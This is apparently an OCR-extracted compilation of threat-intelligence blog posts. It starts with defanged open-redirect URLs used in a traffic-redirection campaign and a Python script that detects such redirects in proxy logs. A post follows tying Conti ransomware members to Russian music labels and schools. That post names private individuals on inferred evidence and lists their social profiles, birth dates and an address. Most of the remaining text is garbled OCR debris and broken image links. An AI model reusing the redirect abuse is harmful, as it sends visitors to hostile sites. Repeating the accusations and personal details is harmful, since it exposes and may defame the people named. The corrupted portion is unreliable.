hxxp://www.centralsynagogue.org/?URL=hxxp://NjNr8Mkm.biggerfun.org/NjNr8Mkm/
hxxp://board-en.piratestorm.com/proxy.php?link=http%3A%2F%2Fnpn8KwBr.biggerfun.org/npn8KwBr/
hxxp://boards.theforce.net/proxy.php?link=hxxp://WihYqBBuvj.biggerfun.org/WihYqBBuvj/
hxxp://www.cutrite.com.au/?URL=hxxp://9MVRIHjF.biggerfun.org/9MVRIHjF/
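
The redirection abuse described above can be hunted for in web proxy logs. The following is an added example, not code from the original post: it flags requests whose `URL` or `link` parameter (the two parameter names in the sample URLs) points off-site to a host whose leftmost label is repeated as the first path segment, then groups the hits by parent domain. All hosts in the sample log are constructed placeholders, and taking the last two labels as the parent domain is a simplifying assumption.

```python
from collections import defaultdict
from dataclasses import dataclass
from urllib.parse import parse_qsl, urlsplit

# Parameter names taken from the sample URLs in this post (?URL=, proxy.php?link=).
REDIRECT_PARAMS = {"url", "link"}


@dataclass(frozen=True)
class RedirectHit:
    source_host: str     # site whose redirect feature was used
    target_host: str     # off-site host the visitor is sent to
    token: str           # leftmost DNS label of the target host
    token_in_path: bool  # True when the same token is the first path segment


def refang(url):
    """Turn a defanged hxxp:// indicator back into a parseable URL."""
    return (url.replace("hxxps://", "https://")
               .replace("hxxp://", "http://")
               .replace("[.]", "."))


def target_of(value):
    """Parse a redirect parameter value, which may lack a scheme."""
    value = refang(value.strip())
    if "://" not in value:
        value = "http://" + value
    parts = urlsplit(value)
    return (parts.hostname or "").lower(), parts.path


def inspect(logged_url):
    """Return a RedirectHit for an off-site redirect request, else None."""
    parts = urlsplit(refang(logged_url))
    source = (parts.hostname or "").lower()
    # parse_qsl percent-decodes values, so http%3A%2F%2F... is handled here.
    for name, value in parse_qsl(parts.query):
        if name.lower() not in REDIRECT_PARAMS:
            continue
        host, path = target_of(value)
        if not host or host == source or host.endswith("." + source):
            continue  # relative or same-site redirects are expected behaviour
        labels = host.split(".")
        first_segment = path.strip("/").split("/")[0].lower()
        repeated = len(labels) > 2 and first_segment == labels[0]
        return RedirectHit(source, host, labels[0], repeated)
    return None


def summarize(logged_urls, min_sources=2):
    """Map parent domain -> (distinct abused sites, distinct tokens)."""
    seen = defaultdict(lambda: {"sources": set(), "tokens": set()})
    for logged_url in logged_urls:
        hit = inspect(logged_url)
        if hit and hit.token_in_path:
            # Assumption: parent domain = last two labels. Use a public
            # suffix list in production to handle suffixes such as .com.au.
            parent = ".".join(hit.target_host.split(".")[-2:])
            seen[parent]["sources"].add(hit.source_host)
            seen[parent]["tokens"].add(hit.token)
    return {parent: (len(v["sources"]), len(v["tokens"]))
            for parent, v in seen.items() if len(v["sources"]) >= min_sources}


# Constructed sample proxy log entries (placeholder hosts, not real indicators).
SAMPLE_LOG = [
    "hxxp://publisher-a.example/?URL=hxxp://kq7TzP1x.tds-farm.example/kq7TzP1x/",
    "hxxp://forum-b.example/proxy.php?link=http%3A%2F%2Fz9LmW2aa.tds-farm.example/z9LmW2aa/",
    "hxxp://shop-c.example/?URL=Ab3dE9.tds-farm.example/AB3DE9/",
    "hxxp://forum-b.example/proxy.php?link=https://docs.vendor.example/manual/",
    "hxxp://publisher-a.example/?URL=/local/page",
    "hxxp://publisher-a.example/search?q=url+shortener",
]

if __name__ == "__main__":
    for parent, (sites, tokens) in summarize(SAMPLE_LOG).items():
        print(f"{parent}: reached via {sites} sites, {tokens} distinct tokens")
```

On the site owner's side, the corresponding fix is to restrict such redirect parameters to relative paths or an allowlist of known hosts.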


[3] 
Sample traffic redirection and traffic management domains involved in the campaign include:




Sample related domains known to have been involved in the campaign and currently
parked at 193.106.175.18 - AS50465 - IQHost Ltd include:




I’ll continue monitoring the campaign and will post updates as soon as new developments take 
place. 


2024 


2.1 January 


2.1.1 Who’s Behind the Conti Ransomware Gang? - Part Two (2024-01-03 16:35) 


[1] 


[Image: Rewards for Justice poster (U.S. Department of State, Diplomatic Security Service, @RFJ_USA) titled "Foreign Government-Linked Malicious Cyber Activity Targeting U.S. Critical Infrastructure". Poster text: "If you have information that ties hacking groups such as Conti, TrickBot, Wizard Spider; the hackers known as “Tramp,” “Dandis,” “Professor,” “Reshaev,” or “Target”; or any malware or ransomware to a foreign government targeting U.S. critical infrastructure, you may be eligible for a reward. Send your information to RFJ via our Tor-based tip line below." The poster also carries a U.S. government photo captioned "Is this the Conti associate known as “Target”?"] 

In a series of blog posts I exposed the "[2]The Top Management of the Conti Ransomware 
Group’s Fashion and Charity Brands" including "[3]Who’s Behind the Conti Ransomware 
Gang" where I also offered an in-depth peek inside "[4]The Conti Ransomware Gang and 
the Trickbot Cybercrime Enterprise XMPP’s and Jabber Account IDs" where I also successfully 
applied for the Rewards for Justice program "[5]Applying for the Rewards for Justice on the 
Conti Ransomware Gang Program" where I also published never-published or discussed before 
"[6]New Images Courtesy of the Conti Ransomware Gang" including my Rewards for Justice 
Conti Ransomware Gang research compilation "[7]Dancho Danchev’s Rewards for Justice 
Conti Ransomware Gang Research and Analysis Compilation" which you can grab from [8]here 
including my first Twitter Space on how I tracked down the Conti Ransomware Gang "[9]My 
First Twitter Space on How I Tracked Down The Conti Ransomware Gang Using Real-Time 
OSINT" including to expose "[10]Exposing Bentley and Liam From The Conti/Trickbot Malware 
Gang" including to publish never-published or discussed before Conti Ransomware Gang 
videos and images courtesy of the "[11]The Conti Ransomware Gang" including to publish 
an additional set of never-published or released videos courtesy of the Conti Ransomware 
Gang "[12]The Conti Ransomware Gang - Videos - Part Two" including to elaborate on some 
of my research in my "[13]Rewards for Justice - Dancho Danchev" including to publish an 
additional set of "[14]The Conti Ransomware Gang’s OSINT Artifacts" including to also provide 
"[15]A Compilation of Conti Ransomware Gang BitCoin Transaction IDs - An OSINT Analysis" 
including "[16]A Compilation of Known Conti Ransomware Malicious Domains - An OSINT 
Analysis" including "[17]A Compilation of Known Conti Ransomware Themed Malicious and 
Fraudulent MD5s - An OSINT Analysis" including "[18]Exposing the Fashion Brands of the Conti 
Ransomware Group" including "[19]Exposing the Trickbot Malware Gang - An OSINT Analysis" 
including "[20]Exposing the Conti Ransomware Gang - An OSINT Analysis" including "[21]A 
Compilation of Known Conti Ransomware Gang Malicious Executable Download Locations - An 
OSINT Analysis" including "[22]Exposing the Conti Ransomware Gang - An OSINT Analysis" 
including "[23]Rewards for Justice - Dancho Danchev" including "[24]How to Take Down the 
Conti Ransomware Gang - A Practical And Relevant Case Study on Taking Down Cybercriminal 
Infrastructure - A Practical Example". 


In this post I’ll do a last round of elaboration on all the research efforts I’ve been putting into 
identifying core members of the Conti Ransomware Gang using their recently leaked internal 
communication, relying exclusively on OSINT for the purpose of successfully identifying 
key and core members of what appears to be a diversified cybercrime gang that has 
a pretty interesting way of distributing their fraudulently obtained income in the context of 
sponsoring and participating in fashion shows and other educational and music sponsorship 
efforts and campaigns on the Russian market, supposedly using the stolen income that they’ve 
obtained using their ransomware tactics and techniques. 


What I came up with was the following: a private teaching school, a rap and hip-hop music label where 
we got some of the core Conti Ransomware Gang members doing their advertising creative 
and brochures next to doing their hardcore "upcoming" ransomware brand releases, including 
several fashion and clothing brands where we once again have core members of the Conti 
Ransomware Gang doing their advertising and brochure creative. 


The primary goal behind this post and analysis would be to elaborate as to the diverse nature 
of the members of the Conti Ransomware Gang in the context of having them involved in 
fashion, music and teaching schools business and charitable initiatives in Russia, supposedly 
using the stolen income which they obtained using their ransomware operation online. 


It’s also worth pointing out that this entire analysis including the OSINT analysis and the OSINT 
research and enrichment analysis is entirely based on the Conti Ransomware Gang’s internal 
leaked communication and is done exclusively by me with some quite positive and confirmed 
results already. 


[25] 
Sample Conti Ransomware Gang image obtained using public sources based on the gang’s 
internal leaked communication for a cover of a Russian Rap and Hip-Hop Artist and his 
album "Personality" apparently produced by the Conti Ransomware Gang’s team members 
responsible for the advertising creative development for the gang 


Based on my research and analysis the photo obtained using public sources based on the 
gang’s internal leaked communication for a cover of a Russian Rap and Hip-Hop Artist and his 
album "Personality" belongs to the Russian rap and hip-hop artist known as Linkvill where we 
have members of the Conti Ransomware Gang producing their logos and advertising creative 
part of their portfolio. 


Personally identifiable information for Evgeny Samsonov also known as Linkvill: 


hxxp://vk.com/eugene _linkvill 
hxxp://vk.com/artist/linkvill 
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hxxp://vk.com/linkvill _poetry 
hxxp://www. youtube.com/channel/UC9fVu7UVgxBaCRz7RJD7DeQ 


Sample personal photos of Evgeny Samsonov also known as Linkvill: 
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It also appears that Evgeny Samsonov also known as Linkvill whose album cover "Personality" 
was obtained using public sources and appears to be produced by members of the Conti 
Ransomware Gang who are responsible for creating the gang’s advertising creative is also 
part of the Plastika Sound Boutique Ekaterinburg where we also have a second image courtesy 
of members of the Conti Ransomware Gang mentioning the Plastika music label. 


[49] 


Sample personally identifiable information for Plastika Sound Boutique Ekaterinburg: 


hxxp://vk.com/plastika.space 
hxxp://plastika.space 
Address: ynuua Kuposa, 9, EkatepuxH6ypr 


Part of Plastika Sound Boutique Ekaterinburg are: 


- Nikita Zharinov - born on 10th of January 2002 
- Ice Costa - hxxp://vk.com/icecosta 
- Alexey Plyushkin - born on 11th of April 1994 
It gets even more interesting when we research a second image courtesy of the Conti 
Ransomware Gang which was once again obtained from their recently leaked internal 
communication. 


Sample Conti Ransomware Gang image obtained using public sources based on the gang’s 
internal leaked communication for a cover of a Russian Rap and Hip-Hop Artist Ice Costa 
apparently produced by the Conti Ransomware Gang’s team members responsible for the 
advertising creative development for the gang 


The image appears to be a second album cover once again produced by team members of 
the Conti Ransomware Gang responsible for advertising logos and advertising creative 
development this time by Ice Costa who is also a Russian rap and hip-hop artist who is also part of 
the Plastika Sound Boutique Ekaterinburg. 


Sample photos of Ice Costa  (hxxp://www.youtube.com/channel/UCJQmq6U _ - 
IEYIDnrNSOzZC6dQ): 
The original Ice Costa album cover which is greatly similar to the one produced by members 
of the Conti Ransomware Gang obtained using OSINT 


[58] 
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Sample photos of Nikita Zharinov who is among the original founders of the Plastika Sound 
Boutique Ekaterinburg: 
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Sample photos of Alexey Plyushkin who is among the original founders of the Plastika Sound 
Boutique Ekaterinburg: 
[65] 


It appears that based on my OSINT analysis Alexey Plyushkin is the author of the original 
cover for Ice Costa’s album which can be also found in Conti Ransomware Gang’s internal 
leaked communication which means that he supposedly knows the actual team member of 
the Conti Ransomware gang that produced the advertising creative who also produced Evgeny 
Samsonov’s (Linkvill) album cover. 


Next we got three related images once again courtesy of the Conti Ransomware Gang’s 
internal leaked communication this time for "Global School" teaching enterprise and for the 
Youla Land dance lessons school in Russia. 


Sample photos include: 


[67] 


[68] 


Sample personally identifiable information: 


hxxp://school-global.ru 


hxxp://youladance.ru 


Sample photos: 
[71] 


Next we’ve got yet another photo of team members of the Conti Ransomware Gang once 
again based on their internal leaked communication mentioning [72]Morenehost which is a 
well known bulletproof hosting provider. 


Sample personally identifiable information: 


Phone: +373 775 96666 
E-mail: info@morene.host 
Skype: morene.host 
Jabber: morene@jabber.morene.host 
ICQ: 700812649 / 702647156 
Telegram: @hostmorene 
Viber: +373 775 96666 
WhatsApp: +373 775 96666 
Online chat: https://morene.host 


2. https://ddanchev.blogspot.com/2023/08/the-top-management-of-conti-ransomware.html 
3. https://ddanchev.blogspot.com/2023/08/whos-behind-conti-ransomware-gang.html 
4. https://ddanchev.blogspot.com/2023/09/the-conti-ransomware-gang-and-trickbot.htm 
5. https://ddanchev.blogspot.com/2023/09/applying-for-rewards-for-justice-on.htm 
6. https://ddanchev.blogspot.com/2023/09/new-images-courtesy-of-conti-ransomware.htm 
7. https://ddanchev.blogspot.com/2023/09/dancho-danchevs-rewards-for-justice.htm 
8. https://archive.org/details/rewards-for-justice-01 
9. https://ddanchev.blogspot.com/2023/10/my-first-twitter-space-on-how-i-tracked.htm 
11. 
12. 
13. 
14. 
15. https://ddanchev.blogspot.com/2022/06/a-compilation-of-conti-ransomware-gang.htm 
16. https://ddanchev.blogspot.com/2022/06/a-compilation-of-known-conti-ransomware_4.htm 
17. https://ddanchev.blogspot.com/2022/06/a-compilation-of-known-conti-ransomware.htm 
18. https://ddanchev.blogspot.com/2023/04/exposing-fashion-brands-of-conti.htm 
19. https://ddanchev.blogspot.com/2022/03/exposing-trickbot-malware-gang-osint.htm 
20. https://ddanchev.blogspot.com/2022/02/exposing-conti-ransomware-gang-osint_28.htm 
21. https://ddanchev.blogspot.com/2022/06/a-compilation-of-known-conti-ransomware_21.htm 
22. 
23. 
24. 

QpEiJOMtGPI_oNZzw1igZGQj046_UNIKuZw/7WWH2krElu-DTqgtpohfL 
26. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEiJD2bRJZ1cF0gRE11_NP4PgwBU_XiE0QjknDdZiiWVsHz 
£3zZYhlgaiNSXq3YD80Rt 7puQtU3_MJh3ulakwAtk2hF_UPLbPjdf5m 


27. https://blogger .googleusercontent . com/img/b/R29vZ2x1/AVvXsEg8G4udB3HWUib7T7WF 1H2cTaNP1FiaBbn3u1U5GD£3DX8 
Z8ehM9 JhD8tKb1inW8WuTt OwFiEA6-LDgOipah_kkd1Yo9LJXeKoruD76 
28. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEgjZTWEK6ixa4B91H6gZCv_SAR17xYSapjU1-ZIIZOiWxo 


i} 
fon) 
nt 
2 


u1KB jOb9gEBEfhRIx7iIDX3qPTGcuoyLjGSCWPrf5bM56fUzxXv- 
9. 


N 


ct 
(ag 
uc) 
n 
| Pad 
"aS 
oO 
# 
° 
9g 
09 
0) 
RK 
09 
° 
° 
09 
H 
oO 
Sc 
“1 n 
; | ® 
re 
2) 
° 
“iB 
a | ag 
0) 
B 
ct 
a 
fe} 
B 
~ 
H. 
8 
09 
S 
jon 
S 
=e) 
N 
Se) 
<q 
N 
roN 
fa 
H 
~ 
> 
< 
<q 
fal 
n 
i] 
BH. 
tal 
09 
[o) 
Q 
< 
{>) 
uc) 
N 
aS 
D 
U 
j=) 
<= 
tS 
(=) 
B 
= 
D 
° 
Q 
fo) 
j=) 
(s) 
a 
=] 
i=) 
< 
B 
QD 
pb 
B 
(ee) 
a) 
fe) 
yr 
foe) 
N 
wn 
Ke) 
09 
n 
N 
» 


rw) 
I 
‘Uv 
Q 
iS) 
us 
re) 
Q 
j=) 
< 
=") 
a 
H 
N 
N 
<= 
oO 
i 
ct 
w 
S 
i 
NJ 
ce 
c 
Q 
fe 
mw 
ua 
u 
~ 
Fh 
w 
au 
u 
<q 
jo) 
=] 
SG 
Q 
ba 
Q 
qq 
2 
eH 
n 
oO 
09 
fe) 
° 
ao 
B 
a 
H 
N 


ttps://blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEi-t8eLyWvzasdczb-4C jZSDKX9wDb3W11V0b2gXrbJA7_ 


Ww 
= 


OO 
wn 
ct 
=a 
n 
oO 
< 
09 
© 
it 
‘Ug 
Hy 
H 
No} 
Qa 
B 
= 
Kh 
es 
es 
ps) 
gq 
Q 
pe 
Qa 
B 
o>) 
ir] 
ps 
B 
=z 
4 
iS 
< 
< 
=a 
Ww 
Ww 
Q 
is] 
= 
oe) 
B 
fle} 
Fh 
“NI 
is) 
N 
H 
09, 
=a 
c 
tar 


WwW 
H 
ct 
ct 
ue] 
n 
ie 
=s 
ion 
H 
fe) 
0Q 
0Q 
() 
R 
09 
fo) 
fe} 
(he) 
H 
(0) 
(= 
n 
(0) 
5 
fa) 
° 
=] 
ct 
(0) 
=] 
ct 
a 
° 
B 
Ss 
b 
B 
oq 
~S 
lon 
~ 
ie 
N 
oO 
< 
N 
N 
tal 
H 
~ 
Pd 
< 
<g 
al 
n 
ina 
= 
Ww 
N 
Rd, 
N 
° 
+O 
N 
() 
fH 
H 
oe) 
= 
w 
<= 
Ss 
N 
qq 
B 
Q 
Ww 
N 
oO 
g 
(he 
pad 
=m 
N 
B, 
eS 
pas) 
ina 
aS 
=] 
(os) 
fo} 
ps) 
© 
< 
n 
N 
) 


mnkbal7yErC3ys041KsLAOFT6CZuri5u8Rt6rAPcDNcVv0iCsurL_36 
2 


WwW 


Xe) 
Hh 
al 
w 
B 
w 
i) 
S 
HA 
< 
w 
pan 
ss 
yr 
ie) 
No |e 
an 
wo 
=) 
ia] 
ol 
[ay 
Q. 
> 
Q 
n 
es 
is 
a. 
oO 
ct 
HB. 
o 
my): 
tal 
< 
~ 
ot 
fo) 5 
w 
tal 
<4 
Nj 
Ny 
Hh 
ue) 
4 
w 
B 


ct 
ct 
uc] 
n 
~ 
fas 
ion 
H 
fe} 
0Q 
09 
(0) 
5 
09 
fo) 
fe} 
(he) 
H 
(0) 
i= 
n 
(0) 
4 
fa) 
° 
(=! 
ct 
(?) 
Bb 
ct 
fa) 
° 
B 
~ 
H 
B 
(te) 
~S 
ion 
aS 
De 
N 
oO 
<q 
N 
NO 
tal 
H 
~ 
Pad 
< 
<g 
asl 
n 
ina 
qw. 
tal 
wn 
© 
tf 
N 
@ 
n 
carl 
= 
Hy 
(oe) 
KS 
fas] 
= 
< 
x 
=a 
N 
tH 
a 
=} 
“NI 
wn 
w 
B 
< 
8 
uel 
a 
an 
ha 
iw] 
H 
qq 
y 
bp 
> 
wo 
B 


WwW 
Ww 
co 
ct 
ue] 
a 
~N 
SN 
ion 
H 
° 
09 
0Q 
lo) 
R 
09 
° 
° 
(ie) 
Hb 
© 
fe 
a 
to) 
4 
fa) 
° 
(=) 
ct 
0) 
=] 
ct 
fa) 
° 
B 
N 
H 
=} 
(ie 
N 
lon 
N 
Ps) 
iS) 
o 
< 
N 
iS) 
tal 
H 
N 
> 
= 
< 
al 
a 
sz 
= 
uv 
B, 
co) 
Ay 
=) 
0 
[?) 
5 
(an 
os 
ion 
a 
5 
H 
° 
4 
oa 
= 
=] 
a 
oO 
= 
Ps 
(oe 
oq 
Q 
Q 
00 
Q 
H 
g 
Oo 
fag 
N 
rr 
w 
re) 
Fh 
> 
© 


Z6aHtah7BFCOyfE1MkYs49umHPBGDTv4a7-KO7HIkXMayn_wAf8I0q 


WwW 
ms 
ct 
ct 
uel 
a 
~ 
~ 
a 
H 
fe} 
09 
09 
(0) 
5 
09 
° 
fe} 
(i) 
H 
() 
c 
n 
(0) 
8 
fa) 
ie} 
B 
ct 
(0?) 
B 
ct 
fa) 
ie} 
B 
~ 
H 
B 
0a 
~ 
a 
~ 
wD 
iS) 
xe) 
<g 
N 
i) 
fa] 
H 
~ 
Pad 
< 
<q 
fal 
n 
ie2) 
a 
Q 
Fh 
Hy 
fou 
xe) 
< 
‘U 
wn 
as) 
xe) 
NJ 
w 
H 
H 
NS 
Kh 
ca | 
N 
ps 
a) 
Hi 
< 
(ye) 
fe) 
w 
ay 
Hh 
o>) 
ps 


Ni 
° 
i=) 

(ic) 

= 
a 
«3 
9 
o 
'uU 
fo 
ra) 


te) 
[o>) 
n 
‘U 
ol 
ian] 
is] 
(o>) 
yc) 
te} 
Eat 
(o>) 
oO 
iw] 
w 
@ 
al 
H 
gq 
mS 
N 
Kh 
w 
= 
= 
N 
NO 
Ww 
< 
ol 
oO 
wm 
NI 
= 
Qa 
iS 
n 
yy 
3 
ue] 
(=) 
Ni 
Ww 
oO 
fare 
(o>) 
o 
uo) 
© 
a 
00 


WwW 
ul 


ttps://blogger .googleusercontent .com/img/b/R29vVZ2x1/AVvXsEhjUsR3ZF_Vt803U0 JKD5k6n-KRo9t jkaCt4-RyHeGkd9 
1RGOFscZ055MR7SUG4V018N JroN7Eafa0BLf£Q-9Mz0TiuoC9Jgyqrcp 


36. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEhWISUdUBDQkmnrcGkS0i IvkRd1Z1FVeHUU- oE6iUxzFIb 
xESt_3egR-zK3G8Sn6tcS__hOXFkpf6wdiVD1Kzj YOFENQG2xVmilZx 

37. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVvXsEhkeaHz5E01hZDNK6RzQr2E-LyUZfmzx3y JFyhLBeaQKI 
xE_5Tt_AIQhT-DW294uD99TiAF1Kv1-F539aMU-m_WDBekJireF40mGc 

38. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVVvXsEjoSe9-LSy5iWIQoRraKMiuHkK Jm8vyN4FOTiNYErgL4sY 

r Jp9e6zIEUqGC- Aa915c5q0UXe8wbSjz41uFmVQ1eKewcbVef70LQ9D- 

39. https://blogger.googleusercontent .com/img/b/R29vZ2x1/AVVXsEiVs9XalWehVTLLjn7R8£ o03WuBtz3N6NQq78aMf vFIf-¢ 
z4wBHbAqOwP JG7c5d00cOU_3K3nCnMmF JhMvz3Xq_BZLW50bJ Jnk2bL 

40 ttps://blogger .googleusercontent .com/img/b/R29VZ2x1/AVvXsEiUkN2_DQTdmybCDSTGy6bHS9tulo9boP7woS-ofejmnh- 


5 
Bq 
Pe 
S) 
n 
a 
a 
0) 
a) 
ake 
| 
H 
ion 
sa 
yj 
a 
= 
ol. 
8 
Ee 
eI 
ct 
x 
x, 
© 
N 
a 
a 
Q 
° 
vu 
IN) 
te 
aD 
ws 
KS 
co 
Q 
on 
09 
is 
To) 
ima 
N 
Parl 
B 
col 
fe 
5 
ue) 
A 


ct 
ct 
uc] 
n 
~ 
~ 
ion 
# 
fe) 
0Q 
09 
(0) 
5 
09 
fo) 
fe} 
(he) 
H 
(?) 
i= 
n 
(0) 
8 
fa) 
° 
(=| 
ct 
(0?) 
=] 
ct 
fa) 
° 
B 
~ 
bE 
B 
oq 
pa 
lon 
~ 
Pel 
N 
oo 
i] 
N 
NO 
tal 
H 
So 
Pa 
< 
<g 
asl 
n 
az 
pb 
ct 
x 
G2 
Co} 
tat 
nS 
QQ 
qQ 
is] 
G 
5 
oO 
° 
Q 
be 
n 
Q 
ws 
ay 
“I 
+Q 
oO 
= 
Db 
Qa 
o 
Ie 
bat 
(o>) 
Hh 
(o>) 
iw] 
H 
Q 
B. 
an 
w 
ry 
iw] 
(0) 
ro! 


1. 


sNvMjDMqc4PyvpDQWK7qadRoPexhgyBr9h890wueNwH1-sm_1eM2j1 
42. https://blogger .googleusercontent .com/img/b/R29vZ2x1/AVvXsEhpAD29-K_hyphenhyphentL56ciTFgBZiZafNqfu4u08E 
V9_4gN-Q5USqe3833sGFGHKQ£kPmv71En1irYFMz-s15BgMZO0b9XV72Z 


N 
N 
ol 


Ww 


ttps://blogger . googleusercontent .com/img/b/R29VZ2x1/AVvXsEjwFnhPpy2XhpAH9bj LwbCsOZbxucSrwtsso0T9C4ZhAe 


sxuT3c-Uvg0sDTe0GPgxJxbvMmpkc8xD jXZu6DockjZBORq1vHxcnxa 
ttps://blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEhETWCHEpdX9H5qwWQ j prL9UVLwomyKakYnHaT jnqNKJN. 
yHRmuZn8DIcjUGm61kdfNYyhShQmBHruYbROGBHhJchWxVih1j1FqkUH 


ttps://blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEiRpqMBXIBhZOs5cbuKhucV7Cdy6WKd6nib8eyA0XbjbiE 
ttps://blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEhaC1cC- vMT7QmI01YsLcf9Fp4ezoo0 JmymkAfGLFb4c7- 


cvTmErvr68gHrzv8E5v/7GIc7qMOM1VrpfFeiwJCp5QLnROc- 3£04D0R 
ttps://blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEhv7tEf 7 YVfp7yazkAORsCjHX8uiofmt-t31CvTZE9 jpT 
ROcvtpmbGGZUEbxE_FNA_o0zjAs2DprBnQ70xZqNwA_Dh30X6 


ttps://blogger . googleusercontent.com/img/b/R29vZ2x1/AVvXsEgAk4G2anmg IuSrCD8BpL8DFA4R4nEENXC J2MX j wnAo1WC 


Uf2wsjAxlmlrVr6gy8NiLf-1tsdFRa_wqjpE2MxhJDEsHsM17_HQck 


> 


= 2 . P~ =} - 
Oye; D Iog | 
N av 
o ez] 
eH a 
' ~ 
tal 
(ov) 
< 
N 
0a 
o 
0a 
w 
N 
~ 
=a 
bal 
oe) 
oO 
PS) 
foe) 
w 
Bs) 
fo) 
Q 
oO 
a 
(an 
[o>) 
R 
= 
© 
us 
B 
Q 
w 
es 
iw] 
2 
‘o 
Qa 
<q 
<= 
09 
ua. 
i= 
in” 
ua. 
= 
Ww 
B 
Q 
Hh 


1h TS 
Xe} 
ct 
ct 
uel 
a 
~ 
SS 
a 
Bp 
fe) 
9a 
09 
0) 
A 
09 
[e} 
ie} 
09 
H 
() 
c 
a 
(0) 
R 
fa) 
ie} 
B 
ct 
0) 
B 
ct 
fa) 
° 
B 
ee 
be 
B 
(i) 
S 
a 
S 
De 
NO 
Ke) 
<q 
N 
i) 
ps 
H 
™~ 
> 
< 
<q 
fal 
n 
isa) 
09 
Ke) 
N 
B 
ws 
<q 
ar 
B 
jo) 
ra 
[53 
< 
=a 
i) 
= 
H 
c 
i) 
a 
ct 
N 
H 
gq 
tal 
09 
foe) 
AJ 
(rz) 
p=) 
is] 
< 
09 
w 
wa 
o>) 
a) 
0) 
N 
< 
1) 


Ckts4MKg3VozmF OkLfXDSbo0albrF J6kImueRmdZtQtr918VyJMInd 
ttps://blogger . googleusercontent.com/img/b/R29VZ2x1/AVvXsEhdRKEQhoDCYZb1 vhz2M90xKHZws1R71AJJifclpJP-t9 


sxI5FJ_XKLFKYYE4jQtVnvjEb784tTtGuwj o68Dyn8M9RWCRzzDt2hm 


51. https: //blogger.googleusercontent.com/img/b/R29vZ2x1/AVVXsEiEi je8e08-DTU1LDR219rYObWimz5Mo_V-Oe8dtcG7_eXg 


ul 
| 


> 
oO 
wn 
< 
ra 
a 
N 
i= 
0Q 
aS 
oO 
oO 
Q 
~N 
w 
=! 
< 
Ww 
S< 
< 
4 
ct 
Pad 
G 
iw] 
is 
oO 
ar 
Pad 
Q 
re 
< 
+Q 
N 
= 
wn 
=a 
09 
ct 
Q 
re 
ct 
Dn 
[on 
N 
NO 
Hh 
H 
a) 
H 
© 
= 
ta 


ul 
N 


ttps://blogger. googleusercontent.com/img/b/R29VZ2x1/AVVvXsEh3V1IxtAsO6L7ROOchgRSHMXDyvmkZ yho4k jagwuGm4 


fa) 
oO 
Co. . 
rer 
i=] 
0g 
<g 
oO 
ct 
w 
fo) 
@ 
nw 
a 
> 
0a 
n 
n 
a 
ol 
oO 
=] 
cal 
() 
w 
a 
< 
© 
an 
tal 
fan 
o 
SNS 
{ie} 
| 
i= 
iy 
K 
w 
as) 
=] 
= 
NO 
be 
N 
tol 
a 
Q 
Pr 
H 
tal 
n 
n 
ww 
<g 
N 


ttps://blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEi_tk5-Ne57sHVOJB- XAnuKb6TFi6zNwaC8B4dXa8Srrp 
FNFQU- 
ttps://blogger. googleusercontent.com/img/b/R29vZ2x1/AVvXsEhoFnIdLCRuikRTspBNI9L- gQMwVf226Pq7n2fHGvkWdN 


ul 
Sa 


+Q 
ct 
0) 
= 
N 
B 
fo) 
ps 
Ni 
fH 
N 
Kh 
ao 
‘Uv 
Et} 
=4 
ct 
0) 
< 
iS) 
“NI 
N 
p=) 
ct 
Q 
ct 
rr 
= 
= 
yy 
Bb 
p=) 
a 
=] 
N 
Q 
Y 
uc] 
n 
y 
S 
= 
0Q 
fee) 


u 
> 


es) 
ro] 
N 
i=) 
fH 
ASS 
CS 
ao 
yr 
ie) 
ie) 
09 
N 
c 
wn 
oO 
| 
= 
wn 
j=) 
a) 
G 
< 
=") 
ao 
N 
H 
=z 
=~ 
w 
: 
4 
B 
yy 
ua 
o 
rv) 
H 
= 
re) 
a 
oO 
n 
2 
Gl 
(=) 
+Q 
ct 
re) 
p=) 
Fh 


ttps://blogger. googleusercontent.com/img/b/R29VvZ2x1/AVvXsEhXqt vo0S644054Y J- EdE6Y6c JC2u9sE04XxLVz72k2c0 
u-guRUm- 


ul 
- 


S< 
(0) 
S< 
< 
=] 
Fh 
nz) 
fo) 
a 
H 
4 
oO 
q 
= 
4 
@ 
Pad 
> 
o 
Be 
iw] 
ica 
qQ 
es] 
(0) 
qQ 
H 
be 
S 
tal 
= 
uel 
o>) 
w 
i= 
=) 
a 
Pa 
N 
Qa 
Ay 
oO 
r 
N 


ul 
[o)) 
ct 
ct 
ue] 
n 
~N 
N 
ion 
B 
° 
(ee) 
09 
© 
R 
0a 
° 
° 
0a 
H 
© 
is 
n 
a) 
R 
a 
° 
5 
ct 
to) 
B 
ct 
a 
fe) 
B 
N 
E 
B 
oa 
N 
jon 
N 
w 
ie} 
oO 
< 
N 
No 
bd 
H 
N 
> 
= 
< 
> 
n 
isa) 
(je) 
K 
N 
ae) 
° 
nN 
H 
eet 
NJ 
ha 
00 
is) 
ue] 
> 
is) 
rs 
° 
0a 
oO 
H 
a 
-) 
N 
q 
ct 
Oo 
= 
=) 
b4 
a 
Es) 
pH 
“ 
is) 
=a 
5 
a. 
qa 
Ee) 
= 
N 
Hh 


Ept13D9yzq9n0GKntduai1SHBrwOT7hqNhi_Q1LIGYT75cscQ33-bU 


ul 
N 
ct 
ct 
uel 
a 
~ 
~ 
o 
H 
fe} 
09 
09 
(0) 
5 
09 
° 
fe} 
(i) 
H 
() 
c 
a 
(0) 
fa) 
ie} 
B 
ct 
() 
B 
ct 
fa) 
° 
B 
™~ 
be 
B 
a 
~ 
o 
~S 
w 
NO 
Ke) 
<g 
N 
iS) 
fa 
H 
~ 
Pa 
< 
<g 
fal 
n 
isa) 
09 
[=] 
a 
col 
N 
H 
4 
dp 
5 
~@ 
a. 
“Ni 
fe) 
ao) 
a 
fe) 
a 
p@ 
a 
i) 
a 
(oe) 
fo) 
Q 
wv 
ue] 
nS 
Qa 
io” 
Ke) 
B 
iS) 
OD 
N 
= 
09 
eo. 
Q 
iS 
be 
@ 
0a 
Fad 
a) 


